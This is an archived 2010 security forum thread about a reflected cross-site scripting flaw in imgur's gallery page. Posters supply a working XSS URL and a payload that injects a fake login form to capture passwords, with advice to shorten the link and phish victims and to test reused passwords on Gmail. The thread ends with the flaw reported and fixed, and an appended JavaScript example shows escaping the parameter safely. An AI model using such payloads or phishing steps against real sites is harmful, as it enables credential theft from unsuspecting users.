Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
XSS in imgur
Posted by: Personoid
Date: June 15, 2010 02:27AM

http://imgur.com/gallery/?v=xss%27%3E%3C/a%3E%3Cscript%3EsetTimeout%28%27alert%28%22xss%22%29%27,%20200%29%3C/script%3E%3Ca%20href=%22?v=xss

Method should be obvious.
I used setTimeout because alert() alone causes the page to stop loading until the viewer has clicked OK (at least in my Firefox).

It's not very useful, but it's there.



Edited 1 time(s). Last edit at 06/15/2010 10:36AM by Personoid.

Re: XSS in imgur
Posted by: Skyphire
Date: June 18, 2010 06:10AM

Nice. Folks tend to forget that it's all about stacking attacks. With a bit of social engineering & phishing this might come in handy since they allow registration, you can capture login credentials and try the victim's Gmail account next to see if they are password re-users (most likely). Or even better: if they have checked "remember my login credentials" in their browsers, you can just submit a button with CSRF and capture everything.

That's why XSS is never trivial.

Re: XSS in imgur
Posted by: Skyphire
Date: June 18, 2010 06:26AM

http://imgur.com/signin

imgur has that handy checkbox: "Stay signed in on this computer"

So it sets a cookie.

Like:

hxxp://imgur.com/gallery/?v=xss'></a><form>
<input tabindex="1" name="username" maxlength="255" id="username" 
class="required" value="" type="text"><input style="margin-bottom: 15px;"
tabindex="2" name="password" maxlength="255" id="password" class="required"
value="" type="password"><input tabindex="4" class="button-big" value="Continue" name="submit" type="button"><script>setInterval("alert(document.forms[0]
['password'].value)",10000);</script>

Wait a bit (10 seconds) and it will echo the password back.

Then put it in a tiny url and start phishing: http://u.nu/8cw3c

Et Voila!



Edited 1 time(s). Last edit at 06/18/2010 06:27AM by Skyphire.

Re: XSS in imgur
Posted by: Skyphire
Date: June 19, 2010 10:58AM

moved to omg pwnies, you may delete this post if you want.



Edited 7 time(s). Last edit at 06/19/2010 12:33PM by Skyphire.

Re: XSS in imgur
Posted by: Personoid
Date: June 27, 2010 02:32AM

It's probably been quite a while and I've yet to get a response.
It's still not fixed either.
I've been holding off on any use of this other than to post it. I might play around a bit and update with my findings.

Edit: Got preoccupied with other shit and didn't do anything with it.
It's now fixed.


"Thank you so much for reporting this. For some reason this email went into my spam folder, but I just wanted to let you know that it's been fixed.

Thanks again,
Alan Schaaf
Founder, Imgur.com"



Edited 1 time(s). Last edit at 07/12/2010 02:59AM by Personoid.
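
The thread does not say how the hole was closed. As an added example (not part of any post above and not imgur's code), here is the "before" next to one way to render a reflected query parameter safely, checked against the URL from the first post. The markup shape (a single-quoted href echoing "v") and all function names are assumptions.

```javascript
// Added example; not imgur's code. Assumption: "v" is echoed into a
// single-quoted href, as the payload in the first post suggests.
const PAYLOAD = decodeURIComponent(
  "xss%27%3E%3C/a%3E%3Cscript%3EsetTimeout%28%27alert%28%22xss%22%29%27," +
  "%20200%29%3C/script%3E%3Ca%20href=%22?v=xss");

// Before: raw concatenation into the attribute.
function renderLinkUnsafe(v) {
  return "<a href='?v=" + v + "'>next</a>";
}

// Incomplete fix: encodeURIComponent leaves ' ( ) * ! ~ alone, so the quote
// still ends a single-quoted attribute.
function renderLinkUrlEncodedOnly(v) {
  return "<a href='?v=" + encodeURIComponent(v) + "'>next</a>";
}

// Escape the characters that are significant in HTML attribute values.
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// After: URL-encode for the query string, then HTML-escape for the attribute.
function renderLinkSafe(v) {
  return '<a href="?v=' + escapeHtmlAttr(encodeURIComponent(v)) + '">next</a>';
}

// Returns the href value if the output is still exactly one <a> element
// whose attribute was not closed early, else null (markup was broken).
function hrefIfIntact(html) {
  const m = /^<a href=(['"])((?:(?!\1).)*)\1>next<\/a>$/s.exec(html);
  return m ? m[2] : null;
}

for (const render of [renderLinkUnsafe, renderLinkUrlEncodedOnly, renderLinkSafe]) {
  const ok = hrefIfIntact(render(PAYLOAD)) !== null;
  console.log(render.name.padEnd(26), ok ? "attribute intact" : "BROKEN OUT");
}
```

URL-encoding alone is not enough here because the single quote survives it; the value has to be escaped for the HTML attribute context as well.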
